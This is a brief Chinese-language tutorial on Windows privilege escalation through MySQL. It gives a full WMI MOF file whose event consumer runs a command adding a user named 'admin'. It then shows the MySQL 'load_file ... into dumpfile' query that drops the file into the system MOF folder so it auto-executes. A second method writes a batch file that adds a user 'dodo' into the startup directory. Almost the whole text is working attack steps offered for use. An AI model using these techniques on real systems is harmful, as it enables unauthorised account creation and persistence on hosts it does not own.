Mof提权的利用方法
将代码保存为.mof文件
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
在mysql中执行下面,通过查询将文件导入
select load_file(’.mof文件的路径’) into dumpfile ‘c:/windows/system32/wbem/mof/.mof(你生成的文件名)’;
导入成功后系统会自动运行该文件。
启动项提权
@echo
net user dodo dodo /add
将代码保存保存成 .bat文件
通过查询将文件导入
select load_file(’.bat文件的路径’) into dumpfile ‘该系统的启动项目录’;
当系统重启时 就会生效